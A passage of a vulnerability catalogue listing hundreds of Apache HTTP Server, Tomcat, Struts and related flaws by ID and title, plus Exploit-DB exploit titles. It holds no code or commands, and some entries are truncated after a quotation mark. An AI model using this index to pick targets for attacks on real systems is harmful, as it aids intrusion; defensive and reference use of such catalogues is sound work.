16587| [65876] Apache Subversion mod_dav_svn denial of service
16588| [65343] Apache Continuum unspecified cross-site scripting
16589| [65162] Apache Tomcat NIO connector denial of service
16590| [65161] Apache Tomcat javax.servlet.ServletRequest.getLocale() denial of service
16591| [65160] Apache Tomcat HTML Manager interface cross-site scripting
16592| [65159] Apache Tomcat ServletContect security bypass
16593| [65050] Apache CouchDB web-based administration UI cross-site scripting
16594| [64773] Oracle HTTP Server Apache Plugin unauthorized access
16595| [64473] Apache Subversion blame -g denial of service
16596| [64472] Apache Subversion walk() denial of service
16597| [64407] Apache Axis2 CVE-2010-0219 code execution
16598| [63926] Apache Archiva password privilege escalation
16599| [63785] Apache CouchDB LD_LIBRARY_PATH privilege escalation
16600| [63493] Apache Archiva credentials cross-site request forgery
16601| [63477] Apache Tomcat HttpOnly session hijacking
16602| [63422] Apache Tomcat sessionsList.jsp cross-site scripting
16603| [63303] Apache mod_fcgid module fcgid_header_bucket_read() buffer overflow
16604| [62959] Apache Shiro filters security bypass
16605| [62790] Apache Perl cgi module denial of service
16606| [62576] Apache Qpid exchange denial of service
16607| [62575] Apache Qpid AMQP denial of service
16608| [62354] Apache Qpid SSL denial of service
16609| [62235] Apache APR-util apr_brigade_split_line() denial of service
16610| [62181] Apache XML-RPC SAX Parser information disclosure
16611| [61721] Apache Traffic Server cache poisoning
16612| [61202] Apache Derby BUILTIN authentication functionality information disclosure
16613| [61186] Apache CouchDB Futon cross-site request forgery
16614| [61169] Apache CXF DTD denial of service
16615| [61070] Apache Jackrabbit search.jsp SQL injection
16616| [61006] Apache SLMS Quoting cross-site request forgery
16617| [60962] Apache Tomcat time cross-site scripting
16618| [60883] Apache mod_proxy_http information disclosure
16619| [60671] Apache HTTP Server mod_cache and mod_dav denial of service
16620| [60264] Apache Tomcat Transfer-Encoding denial of service
16621| [59746] Apache Axis2 axis2/axis2-admin page session hijacking
16622| [59588] Apache Axis2/Java XML DTD (Document Type Declaration) data denial of service
16623| [59413] Apache mod_proxy_http timeout information disclosure
16624| [59058] Apache MyFaces unencrypted view state cross-site scripting
16625| [58827] Apache Axis2 xsd file include
16626| [58790] Apache Axis2 modules cross-site scripting
16627| [58299] Apache ActiveMQ queueBrowse cross-site scripting
16628| [58169] Apache Tomcat Web Application Manager / Host Manager cross-site request forgery
16629| [58056] Apache ActiveMQ .jsp source code disclosure
16630| [58055] Apache Tomcat realm name information disclosure
16631| [58046] Apache HTTP Server mod_auth_shadow security bypass
16632| [57841] Apache Open For Business Project (OFBiz) subject cross-site scripting
16633| [57840] Apache Open For Business Project (OFBiz) multiple parameters cross-site scripting
16634| [57429] Apache CouchDB algorithms information disclosure
16635| [57398] Apache ActiveMQ Web console cross-site request forgery
16636| [57397] Apache ActiveMQ createDestination.action cross-site scripting
16637| [56653] Apache HTTP Server DNS spoofing
16638| [56652] Apache HTTP Server DNS cross-site scripting
16639| [56625] Apache HTTP Server request header information disclosure
16640| [56624] Apache HTTP Server mod_isapi orphaned callback pointer code execution
16641| [56623] Apache HTTP Server mod_proxy_ajp denial of service
16642| [55941] mod_proxy module for Apache ap_proxy_send_fb() buffer overflow
16643| [55857] Apache Tomcat WAR files directory traversal
16644| [55856] Apache Tomcat autoDeploy attribute security bypass
16645| [55855] Apache Tomcat WAR directory traversal
16646| [55210] Intuit component for Joomla! Apache information disclosure
16647| [54533] Apache Tomcat 404 error page cross-site scripting
16648| [54182] Apache Tomcat admin default password
16649| [53878] Apache Solr Search (solr) extension for TYPO3 unspecified cross-site scripting
16650| [53666] Apache HTTP Server Solaris pollset support denial of service
16651| [53650] Apache HTTP Server HTTP basic-auth module security bypass
16652| [53124] mod_proxy_ftp module for Apache HTTP header security bypass
16653| [53041] mod_proxy_ftp module for Apache denial of service
16654| [52540] Apache Portable Runtime and Apache Portable Utility library multiple buffer overflow
16655| [51953] Apache Tomcat Path Disclosure
16656| [51952] Apache Tomcat Path Traversal
16657| [51951] Apache stronghold-status Information Disclosure
16658| [51950] Apache stronghold-info Information Disclosure
16659| [51949] Apache PHP Source Code Disclosure
16660| [51948] Apache Multiviews Attack
16661| [51946] Apache JServ Environment Status Information Disclosure
16662| [51945] Apache error_log Information Disclosure
16663| [51944] Apache Default Installation Page Pattern Found
16664| [51943] Apache AXIS XML Parser echoheaders.jws Sample Web Service Denial of Service
16665| [51942] Apache AXIS XML External Entity File Retrieval
16666| [51941] Apache AXIS Sample Servlet Information Leak
16667| [51940] Apache access_log Information Disclosure
16668| [51626] Apache mod_deflate denial of service
16669| [51532] mod_proxy module for the Apache HTTP Server stream_reqbody_cl denial of service
16670| [51365] Apache Tomcat RequestDispatcher security bypass
16671| [51273] Apache HTTP Server Incomplete Request denial of service
16672| [51195] Apache Tomcat XML information disclosure
16673| [50994] Apache APR-util xml/apr_xml.c denial of service
16674| [50993] Apache APR-util apr_brigade_vprintf denial of service
16675| [50964] Apache APR-util apr_strmatch_precompile() denial of service
16676| [50930] Apache Tomcat j_security_check information disclosure
16677| [50928] Apache Tomcat AJP denial of service
16678| [50884] Apache HTTP Server XML ENTITY denial of service
16679| [50808] Apache HTTP Server AllowOverride privilege escalation
16680| [50108] Apache Struts s:a tag and s:url tag cross-site scripting
16681| [50059] Apache mod_proxy_ajp information disclosure
16682| [49951] Apache Tiles Expression Language (EL) expressions cross-site scripting
16683| [49925] Apache Geronimo Web Administrative Console cross-site request forgery
16684| [49924] Apache Geronimo console/portal/Server/Monitoring cross-site scripting
16685| [49921] Apache ActiveMQ Web interface cross-site scripting
16686| [49898] Apache Geronimo Services/Repository directory traversal
16687| [49725] Apache Tomcat mod_jk module information disclosure
16688| [49715] Apache mod_perl Apache::Status and Apache2::Status modules cross-site scripting
16689| [49712] Apache Struts unspecified cross-site scripting
16690| [49213] Apache Tomcat cal2.jsp cross-site scripting
16691| [48934] Apache Tomcat POST doRead method information disclosure
16692| [48211] Apache Tomcat header HTTP request smuggling
16693| [48163] libapache2-mod-auth-mysql module for Debian multibyte encoding SQL injection
16694| [48110] Apache Jackrabbit search.jsp and swr.jsp cross-site scripting
16695| [47709] Apache Roller "
16696| [47104] Novell Netware ApacheAdmin console security bypass
16697| [47086] Apache HTTP Server OS fingerprinting unspecified
16698| [46329] Apache Struts FilterDispatcher and DefaultStaticContentLoader class directory traversal
16699| [45791] Apache Tomcat RemoteFilterValve security bypass
16700| [44435] Oracle WebLogic Apache Connector buffer overflow
16701| [44411] Apache Tomcat allowLinking UTF-8 directory traversal
16702| [44223] Apache HTTP Server mod_proxy_ftp cross-site scripting
16703| [44156] Apache Tomcat RequestDispatcher directory traversal
16704| [44155] Apache Tomcat HttpServletResponse.sendError() cross-site scripting
16705| [43885] Oracle WebLogic Server Apache Connector buffer overflow
16706| [42987] Apache HTTP Server mod_proxy module denial of service
16707| [42915] Apache Tomcat JSP files path disclosure
16708| [42914] Apache Tomcat MS-DOS path disclosure
16709| [42892] Apache Tomcat unspecified unauthorized access
16710| [42816] Apache Tomcat Host Manager cross-site scripting
16711| [42303] Apache 403 error cross-site scripting
16712| [41618] Apache-SSL ExpandCert() authentication bypass
16713| [40761] Apache Derby RDBNAM parameter and DatabaseMetaData.getURL information disclosure
16714| [40736] Apache Tomcat HTTP/1.1 connector information disclosure
16715| [40614] Apache mod_jk2 HTTP Host header buffer overflow
16716| [40562] Apache Geronimo init information disclosure
16717| [40478] Novell Web Manager webadmin-apache.conf security bypass
16718| [40411] Apache Tomcat exception handling information disclosure
16719| [40409] Apache Tomcat native (APR based) connector weak security
16720| [40403] Apache Tomcat quotes and %5C cookie information disclosure
16721| [40388] Sun Java Plug-In org.apache.crimson.tree.XmlDocument security bypass
16722| [39893] Apache HTTP Server mod_negotiation HTTP response splitting
16723| [39867] Apache HTTP Server mod_negotiation cross-site scripting
16724| [39804] Apache Tomcat SingleSignOn information disclosure
16725| [39615] Apache HTTP Server mod_proxy_ftp.c UTF-7 cross-site scripting
16726| [39612] Apache HTTP Server mod_proxy_balancer buffer overflow
16727| [39608] Apache HTTP Server balancer manager cross-site request forgery
16728| [39476] Apache mod_proxy_balancer balancer_handler function denial of service
16729| [39474] Apache HTTP Server mod_proxy_balancer cross-site scripting
16730| [39472] Apache HTTP Server mod_status cross-site scripting
16731| [39201] Apache Tomcat JULI logging weak security
16732| [39158] Apache HTTP Server Windows SMB shares information disclosure
16733| [39001] Apache HTTP Server mod_imap and mod_imagemap module cross-site scripting
16734| [38951] Apache::AuthCAS Perl module cookie SQL injection
16735| [38800] Apache HTTP Server 413 error page cross-site scripting
16736| [38211] Apache Geronimo SQLLoginModule authentication bypass
16737| [37243] Apache Tomcat WebDAV directory traversal
16738| [37178] RHSA update for Apache HTTP Server mod_status module cross-site scripting not installed
16739| [37177] RHSA update for Apache HTTP Server Apache child process denial of service not installed
16740| [37119] RHSA update for Apache mod_auth_kerb off-by-one buffer overflow not installed
16741| [37100] RHSA update for Apache and IBM HTTP Server Expect header cross-site scripting not installed
16742| [36782] Apache Geronimo MEJB unauthorized access
16743| [36586] Apache HTTP Server UTF-7 cross-site scripting
16744| [36468] Apache Geronimo LoginModule security bypass
16745| [36467] Apache Tomcat functions.jsp cross-site scripting
16746| [36402] Apache Tomcat calendar cross-site request forgery
16747| [36354] Apache HTTP Server mod_proxy module denial of service
16748| [36352] Apache HTTP Server ap_proxy_date_canon() denial of service
16749| [36336] Apache Derby lock table privilege escalation
16750| [36335] Apache Derby schema privilege escalation
16751| [36006] Apache Tomcat "
16752| [36001] Apache Tomcat Host Manager Servlet alias cross-site scripting
16753| [35999] Apache Tomcat \"
16754| [35795] Apache Tomcat CookieExample cross-site scripting
16755| [35536] Apache Tomcat SendMailServlet example cross-site scripting
16756| [35384] Apache HTTP Server mod_cache module denial of service
16757| [35097] Apache HTTP Server mod_status module cross-site scripting
16758| [35095] Apache HTTP Server Prefork MPM module denial of service
16759| [34984] Apache HTTP Server recall_headers information disclosure
16760| [34966] Apache HTTP Server MPM content spoofing
16761| [34965] Apache HTTP Server MPM information disclosure
16762| [34963] Apache HTTP Server MPM multiple denial of service
16763| [34872] Apache MyFaces Tomahawk autoscroll parameter cross-site scripting
16764| [34869] Apache Tomcat JSP example Web application cross-site scripting
16765| [34868] Apache Tomcat Manager and Host Manager cross-site scripting
16766| [34496] Apache Tomcat JK Connector security bypass
16767| [34377] Apache Tomcat hello.jsp cross-site scripting
16768| [34212] Apache Tomcat SSL configuration security bypass
16769| [34210] Apache Tomcat Accept-Language cross-site scripting
16770| [34209] Apache Tomcat calendar application cross-site scripting
16771| [34207] Apache Tomcat implicit-objects.jsp cross-site scripting
16772| [34167] Apache Axis WSDL file path disclosure
16773| [34068] Apache Tomcat AJP connector information disclosure
16774| [33584] Apache HTTP Server suEXEC privilege escalation
16775| [32988] Apache Tomcat proxy module directory traversal
16776| [32794] Apache Tomcat JK Web Server Connector map_uri_to_worker() buffer overflow
16777| [32708] Debian Apache tty privilege escalation
16778| [32441] ApacheStats extract() PHP call unspecified
16779| [32128] Apache Tomcat default account
16780| [31680] Apache Tomcat RequestParamExample cross-site scripting
16781| [31649] Apache Tomcat Sample Servlet TroubleShooter detected
16782| [31557] BEA WebLogic Server and WebLogic Express Apache proxy plug-in denial of service
16783| [31236] Apache HTTP Server htpasswd.c strcpy buffer overflow
16784| [30456] Apache mod_auth_kerb off-by-one buffer overflow
16785| [29550] Apache mod_tcl set_var() format string
16786| [28620] Apache and IBM HTTP Server Expect header cross-site scripting
16787| [28357] Apache HTTP Server mod_alias script source information disclosure
16788| [28063] Apache mod_rewrite off-by-one buffer overflow
16789| [27902] Apache Tomcat URL information disclosure
16790| [26786] Apache James SMTP server denial of service
16791| [25680] libapache2 /tmp/svn file upload
16792| [25614] Apache Struts lookupMap cross-site scripting
16793| [25613] Apache Struts ActionForm denial of service
16794| [25612] Apache Struts isCancelled() security bypass
16795| [24965] Apache mod_python FileSession command execution
16796| [24716] Apache James spooler memory leak denial of service
16797| [24159] Apache Geronimo Web-Access-Log Viewer cross-site scripting
16798| [24158] Apache Geronimo jsp-examples cross-site scripting
16799| [24030] Apache auth_ldap module multiple format strings
16800| [24008] Apache mod_ssl custom error message denial of service
16801| [24003] Apache mod_auth_pgsql module multiple syslog format strings
16802| [23612] Apache mod_imap referer field cross-site scripting
16803| [23173] Apache Struts error message cross-site scripting
16804| [22942] Apache Tomcat directory listing denial of service
16805| [22858] Apache Multi-Processing Module code allows denial of service
16806| [22602] RHSA-2005:582 updates for Apache httpd not installed
16807| [22520] Apache mod-auth-shadow "
16808| [22466] ApacheTop symlink
16809| [22109] Apache HTTP Server ssl_engine_kernel client certificate validation
16810| [22006] Apache HTTP Server byte-range filter denial of service
16811| [21567] Apache mod_ssl off-by-one buffer overflow
16812| [21195] Apache HTTP Server header HTTP request smuggling
16813| [20383] Apache HTTP Server htdigest buffer overflow
16814| [19681] Apache Tomcat AJP12 request denial of service
16815| [18993] Apache HTTP server check_forensic symlink attack
16816| [18790] Apache Tomcat Manager cross-site scripting
16817| [18349] Apache HTTP server Apple HFS+ filesystem obtain information
16818| [18348] Apache HTTP server Apple HFS+ filesystem .DS_Store and .ht file disclosure
16819| [18347] Apache HTTP server Apple Mac OS X Server mod_digest_apple module could allow an attacker to replay responses
16820| [17961] Apache Web server ServerTokens has not been set
16821| [17930] Apache HTTP Server HTTP GET request denial of service
16822| [17785] Apache mod_include module buffer overflow
16823| [17671] Apache HTTP Server SSLCipherSuite bypass restrictions
16824| [17473] Apache HTTP Server Satisfy directive allows access to resources
16825| [17413] Apache htpasswd buffer overflow
16826| [17384] Apache HTTP Server environment variable configuration file buffer overflow
16827| [17382] Apache HTTP Server IPv6 apr_util denial of service
16828| [17366] Apache HTTP Server mod_dav module LOCK denial of service
16829| [17273] Apache HTTP Server speculative mode denial of service
16830| [17200] Apache HTTP Server mod_ssl denial of service
16831| [16890] Apache HTTP Server server-info request has been detected
16832| [16889] Apache HTTP Server server-status request has been detected
16833| [16705] Apache mod_ssl format string attack
16834| [16524] Apache HTTP Server ap_get_mime_headers_core denial of service
16835| [16387] Apache HTTP Server mod_proxy Content-Length buffer overflow
16836| [16230] Apache HTTP Server PHP denial of service
16837| [16214] Apache mod_ssl ssl_util_uuencode_binary buffer overflow
16838| [15958] Apache HTTP Server authentication modules memory corruption
16839| [15547] Apache HTTP Server mod_disk_cache local information disclosure
16840| [15540] Apache HTTP Server socket starvation denial of service
16841| [15467] Novell GroupWise WebAccess using Apache Web server allows viewing of files on the server
16842| [15422] Apache HTTP Server mod_access information disclosure
16843| [15419] Apache HTTP Server mod_ssl plain HTTP request denial of service
16844| [15293] Apache for Cygwin "
16845| [15065] Apache-SSL has a default password
16846| [15041] Apache HTTP Server mod_digest module could allow an attacker to replay responses
16847| [15015] Apache httpd server httpd.conf could allow a local user to bypass restrictions
16848| [14751] Apache Mod_python output filter information disclosure
16849| [14125] Apache HTTP Server mod_userdir module information disclosure
16850| [14075] Apache HTTP Server mod_php file descriptor leak
16851| [13703] Apache HTTP Server account
16852| [13689] Apache HTTP Server configuration allows symlinks
16853| [13688] Apache HTTP Server configuration allows SSI
16854| [13687] Apache HTTP Server Server: header value
16855| [13685] Apache HTTP Server ServerTokens value
16856| [13684] Apache HTTP Server ServerSignature value
16857| [13672] Apache HTTP Server config allows directory autoindexing
16858| [13671] Apache HTTP Server default content
16859| [13670] Apache HTTP Server config file directive references outside content root
16860| [13668] Apache HTTP Server httpd not running in chroot environment
16861| [13666] Apache HTTP Server CGI directory contains possible command interpreter or compiler
16862| [13664] Apache HTTP Server config file contains ScriptAlias entry
16863| [13663] Apache HTTP Server CGI support modules loaded
16864| [13661] Apache HTTP Server config file contains AddHandler entry
16865| [13660] Apache HTTP Server 500 error page not CGI script
16866| [13659] Apache HTTP Server 413 error page not CGI script
16867| [13658] Apache HTTP Server 403 error page not CGI script
16868| [13657] Apache HTTP Server 401 error page not CGI script
16869| [13552] Apache HTTP Server mod_cgid module information disclosure
16870| [13550] Apache GET request directory traversal
16871| [13516] Apache Cocoon XMLForm and JXForm could allow execution of code
16872| [13499] Apache Cocoon directory traversal allows downloading of boot.ini file
16873| [13429] Apache Tomcat non-HTTP request denial of service
16874| [13400] Apache HTTP server mod_alias and mod_rewrite buffer overflow
16875| [13295] Apache weak password encryption
16876| [13254] Apache Tomcat .jsp cross-site scripting
16877| [13125] Apache::Gallery Inline::C could allow arbitrary code execution
16878| [13086] Apache Jakarta Tomcat mod_jk format string allows remote access
16879| [12681] Apache HTTP Server mod_proxy could allow mail relaying
16880| [12662] Apache HTTP Server rotatelogs denial of service
16881| [12554] Apache Tomcat stores password in plain text
16882| [12553] Apache HTTP Server redirects and subrequests denial of service
16883| [12552] Apache HTTP Server FTP proxy server denial of service
16884| [12551] Apache HTTP Server prefork MPM denial of service
16885| [12550] Apache HTTP Server weaker than expected encryption
16886| [12549] Apache HTTP Server type-map file denial of service
16887| [12206] Apache Tomcat /opt/tomcat directory insecure permissions
16888| [12102] Apache Jakarta Tomcat MS-DOS device name request denial of service
16889| [12091] Apache HTTP Server apr_password_validate denial of service
16890| [12090] Apache HTTP Server apr_psprintf code execution
16891| [11804] Apache HTTP Server mod_access_referer denial of service
16892| [11750] Apache HTTP Server could leak sensitive file descriptors
16893| [11730] Apache HTTP Server error log and access log terminal escape sequence injection
16894| [11703] Apache long slash path allows directory listing
16895| [11695] Apache HTTP Server LF (Line Feed) denial of service
16896| [11694] Apache HTTP Server filestat.c denial of service
16897| [11438] Apache HTTP Server MIME message boundaries information disclosure
16898| [11412] Apache HTTP Server error log terminal escape sequence injection
16899| [11196] Apache Tomcat examples and ROOT Web applications cross-site scripting
16900| [11195] Apache Tomcat web.xml could be used to read files
16901| [11194] Apache Tomcat URL appended with a null character could list directories
16902| [11139] Apache HTTP Server mass virtual hosting with mod_rewrite or mod_vhost_alias could allow an attacker to obtain files
16903| [11126] Apache HTTP Server illegal character file disclosure
16904| [11125] Apache HTTP Server DOS device name HTTP POST code execution
16905| [11124] Apache HTTP Server DOS device name denial of service
16906| [11088] Apache HTTP Server mod_vhost_alias CGI source disclosure
16907| [10938] Apache HTTP Server printenv test CGI cross-site scripting
16908| [10771] Apache Tomcat mod_jk module multiple HTTP GET request buffer overflow
16909| [10575] Apache mod_php module could allow an attacker to take over the httpd process
16910| [10499] Apache HTTP Server WebDAV HTTP POST view source
16911| [10457] Apache HTTP Server mod_ssl "
16912| [10415] Apache HTTP Server htdigest insecure system() call could allow command execution
16913| [10414] Apache HTTP Server htdigest multiple buffer overflows
16914| [10413] Apache HTTP Server htdigest temporary file race condition
16915| [10412] Apache HTTP Server htpasswd temporary file race condition
16916| [10376] Apache Tomcat invoker servlet used in conjunction with the default servlet reveals source code
16917| [10348] Apache Tomcat HTTP GET request DOS device reference could cause a denial of service
16918| [10281] Apache HTTP Server ab.c ApacheBench long response buffer overflow
16919| [10280] Apache HTTP Server shared memory scorecard overwrite
16920| [10263] Apache Tomcat mod_jk or mod_jserv connector directory disclosure
16921| [10241] Apache HTTP Server Host: header cross-site scripting
16922| [10230] Slapper worm variants A, B, and C target OpenSSL/Apache systems
16923| [10208] Apache HTTP Server mod_dav denial of service
16924| [10206] HP VVOS Apache mod_ssl denial of service
16925| [10200] Apache HTTP Server stderr denial of service
16926| [10175] Apache Tomcat org.apache.catalina.servlets.DefaultServlet reveals source code
16927| [10169] Slapper worm variant (Slapper.C) targets OpenSSL/Apache systems
16928| [10154] Slapper worm variant (Slapper.B) targets OpenSSL/Apache systems
16929| [10098] Slapper worm targets OpenSSL/Apache systems
16930| [9876] Apache HTTP Server cgi/cgid request could disclose the path to a requested script
16931| [9875] Apache HTTP Server .var file request could disclose installation path
16932| [9863] Apache Tomcat web.xml file could allow a remote attacker to bypass restrictions
16933| [9808] Apache HTTP Server non-Unix version URL encoded directory traversal
16934| [9623] Apache HTTP Server ap_log_rerror() path disclosure
16935| [9520] Apache Tomcat /servlet/ mapping cross-site scripting
16936| [9415] Apache HTTP Server mod_ssl .htaccess off-by-one buffer overflow
16937| [9396] Apache Tomcat null character to threads denial of service
16938| [9394] Apache Tomcat HTTP request for LPT9 reveals Web root path
16939| [9249] Apache HTTP Server chunked encoding heap buffer overflow
16940| [9208] Apache Tomcat sample file requests could reveal directory listing and path to Web root directory
16941| [8932] Apache Tomcat example class information disclosure
16942| [8633] Apache HTTP Server with mod_rewrite could allow an attacker to bypass directives
16943| [8629] Apache HTTP Server double-reverse DNS lookup spoofing
16944| [8589] Apache HTTP Server for Windows DOS batch file remote command execution
16945| [8457] Oracle9i Application Server Apache PL/SQL HTTP Location header buffer overflow
16946| [8455] Oracle9i Application Server default installation could allow an attacker to access certain Apache Services
16947| [8400] Apache HTTP Server mod_frontpage buffer overflows
16948| [8326] Apache HTTP Server multiple MIME headers (sioux) denial of service
16949| [8308] Apache "
16950| [8275] Apache HTTP Server with Multiviews enabled could disclose directory contents
16951| [8119] Apache and PHP OPTIONS request reveals "
16952| [8054] Apache is running on the system
16953| [8029] Mandrake Linux default Apache configuration could allow an attacker to browse files and directories
16954| [8027] Mandrake Linux default Apache configuration has remote management interface enabled
16955| [8026] Mandrake Linux Apache sample programs could disclose sensitive information about the server
16956| [7836] Apache HTTP Server log directory denial of service
16957| [7815] Apache for Windows "
16958| [7810] Apache HTTP request could result in unexpected behavior
16959| [7599] Apache Tomcat reveals installation path
16960| [7494] Apache "
16961| [7419] Apache Web Server could allow remote attackers to overwrite .log files
16962| [7363] Apache Web Server hidden HTTP requests
16963| [7249] Apache mod_proxy denial of service
16964| [7129] Linux with Apache Web server could allow an attacker to determine if a specified username exists
16965| [7103] Apple Mac OS X used with Apache Web server could disclose directory contents
16966| [7059] Apache "
16967| [7057] Apache "
16968| [7056] Apache "
16969| [7055] Apache "
16970| [7054] Apache "
16971| [6997] Apache Jakarta Tomcat error message may reveal information
16972| [6971] Apache Jakarta Tomcat may reveal JSP source code with missing HTTP protocol specification
16973| [6970] Apache crafted HTTP request could reveal the internal IP address
16974| [6921] Apache long slash path allows directory listing
16975| [6687] Apple Mac OS X used with Apache Web server could allow arbitrary file disclosure
16976| [6527] Apache Web Server for Windows and OS2 denial of service
16977| [6316] Apache Jakarta Tomcat may reveal JSP source code
16978| [6305] Apache Jakarta Tomcat directory traversal
16979| [5926] Linux Apache symbolic link
16980| [5659] Apache Web server discloses files when used with php script
16981| [5310] Apache mod_rewrite allows attacker to view arbitrary files
16982| [5204] Apache WebDAV directory listings
16983| [5197] Apache Web server reveals CGI script source code
16984| [5160] Apache Jakarta Tomcat default installation
16985| [5099] Trustix Secure Linux installs Apache with world writable access
16986| [4968] Apache Jakarta Tomcat snoop servlet gives out information which could be used in attack
16987| [4967] Apache Jakarta Tomcat 404 error reveals the pathname of the requested file
16988| [4931] Apache source.asp example file allows users to write to files
16989| [4575] IBM HTTP Server running Apache allows users to directory listing and file retrieval
16990| [4205] Apache Jakarta Tomcat delivers file contents
16991| [2084] Apache on Debian by default serves the /usr/doc directory
16992| [1630] MessageMedia UnityMail and Apache Web server MIME header flood denial of service
16993| [697] Apache HTTP server beck exploit
16994| [331] Apache cookies buffer overflow
16995|
16996| Exploit-DB - https://www.exploit-db.com:
16997| [31130] Apache Tomcat <= 6.0.15 Cookie Quote Handling Remote Information Disclosure Vulnerability
16998| [31052] Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
16999| [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
17000| [30835] Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness
17001| [30563] Apache Tomcat <= 5.5.15 Cal2.JSP Cross-Site Scripting Vulnerability
17002| [30496] Apache Tomcat <= 6.0.13 Cookie Handling Quote Delimiter Session ID Disclosure
17003| [30495] Apache Tomcat <= 6.0.13 Host Manager Servlet Cross Site Scripting Vulnerability
17004| [30191] Apache MyFaces Tomahawk JSF Framework 1.1.5 Autoscroll Parameter Cross Site Scripting Vulnerability
17005| [30189] Apache Tomcat <= 6.0.13 JSP Example Web Applications Cross Site Scripting Vulnerability
17006| [30052] Apache Tomcat 6.0.10 Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
17007| [29930] Apache AXIS 1.0 Non-Existent WSDL Path Information Disclosure Vulnerability
17008| [29859] Apache Roller OGNL Injection
17009| [29739] Apache HTTP Server Tomcat 5.x/6.0.x Directory Traversal Vulnerability
17010| [29435] Apache Tomcat 5.5.25 - CSRF Vulnerabilities
17011| [29316] Apache + PHP 5.x - Remote Code Execution (Multithreaded Scanner) (2)
17012| [29290] Apache / PHP 5.x Remote Code Execution Exploit
17013| [28713] Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE
17014| [28424] Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness
17015| [28365] Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability
17016| [28254] Apache Tomcat 5 Information Disclosure Vulnerability
17017| [27915] Apache James 2.2 SMTP Denial of Service Vulnerability
17018| [27397] Apache suEXEC Privilege Elevation / Information Disclosure
17019| [27135] Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
17020| [27096] Apache Geronimo 1.0 Error Page XSS
17021| [27095] Apache Tomcat / Geronimo 1.0 Sample Script cal2.jsp time Parameter XSS
17022| [26710] Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service
17023| [26542] Apache Struts 1.2.7 Error Response Cross-Site Scripting Vulnerability
17024| [25986] Plesk Apache Zeroday Remote Exploit
17025| [25980] Apache Struts includeParams Remote Code Execution
17026| [25625] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (2)
17027| [25624] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (1)
17028| [24874] Apache Struts ParametersInterceptor Remote Code Execution
17029| [24744] Apache Rave 0.11 - 0.20 - User Information Disclosure
17030| [24694] Apache 1.3.x mod_include Local Buffer Overflow Vulnerability
17031| [24590] Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability
17032| [23751] Apache Cygwin 1.3.x/2.0.x Directory Traversal Vulnerability
17033| [23581] Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability
17034| [23482] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2)
17035| [23481] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1)
17036| [23296] Red Hat Apache 2.0.40 Directory Index Default Configuration Error
17037| [23282] apache cocoon 2.14/2.2 - Directory Traversal vulnerability
17038| [23245] Apache Tomcat 4.0.x Non-HTTP Request Denial of Service Vulnerability
17039| [23119] Apache::Gallery 0.4/0.5/0.6 Insecure Local File Storage Privilege Escalation Vulnerability
17040| [22505] Apache Mod_Access_Referer 1.0.2 NULL Pointer Dereference Denial of Service Vulnerability
17041| [22205] Apache Tomcat 3.x Null Byte Directory/File Disclosure Vulnerability
17042| [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability
17043| [22068] Apache 1.3.x,Tomcat 4.0.x/4.1.x Mod_JK Chunked Encoding Denial of Service Vulnerability
17044| [21885] Apache 1.3/2.0.x Server Side Include Cross Site Scripting Vulnerability
17045| [21882] Apache Tomcat 3.2 Directory Disclosure Vulnerability
17046| [21854] Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability
17047| [21853] Apache Tomcat 3/4 DefaultServlet File Disclosure Vulnerability
17048| [21734] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
17049| [21719] Apache 2.0 Path Disclosure Vulnerability
17050| [21697] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
17051| [21605] Apache Tomcat 4.0.3 DoS Device Name Cross Site Scripting Vulnerability
17052| [21604] Apache Tomcat 4.0.3 Servlet Mapping Cross Site Scripting Vulnerability
17053| [21560] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (2)
17054| [21559] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (1)
17055| [21534] Apache Tomcat 3/4 JSP Engine Denial of Service Vulnerability
17056| [21492] Apache Tomcat 3.2.3/3.2.4 RealPath.JSP Malformed Request Information Disclosure
17057| [21491] Apache Tomcat 3.2.3/3.2.4 Example Files Web Root Path Disclosure
17058| [21490] Apache Tomcat 3.2.3/3.2.4 Source.JSP Malformed Request Information Disclosure
17059| [21412] Apache Tomcat 4.0/4.1 Servlet Path Disclosure Vulnerability
17060| [21350] Apache Win32 1.3.x/2.0.x Batch File Remote Command Execution Vulnerability
17061| [21204] Apache 1.3.20 Win32 PHP.EXE Remote File Disclosure Vulnerability
17062| [21112] Red Hat Linux 7.0 Apache Remote Username Enumeration Vulnerability
17063| [21067] Apache 1.0/1.2/1.3 Server Address Disclosure Vulnerability
17064| [21002] Apache 1.3 Possible Directory Index Disclosure Vulnerability
17065| [20911] Apache 1.3.14 Mac File Protection Bypass Vulnerability
17066| [20716] apache tomcat 3.0 - Directory Traversal vulnerability
17067| [20695] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (4)
17068| [20694] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (3)
17069| [20693] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (2)
17070| [20692] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (1)
17071| [20595] NCSA 1.3/1.4.x/1.5,Apache httpd 0.8.11/0.8.14 ScriptAlias Source Retrieval Vulnerability
17072| [20558] Apache 1.2 Web Server DoS Vulnerability
17073| [20466] Apache 1.3 Web Server with Php 3 File Disclosure Vulnerability
17074| [20435] Apache 0.8.x/1.0.x,NCSA httpd 1.x test-cgi Directory Listing Vulnerability
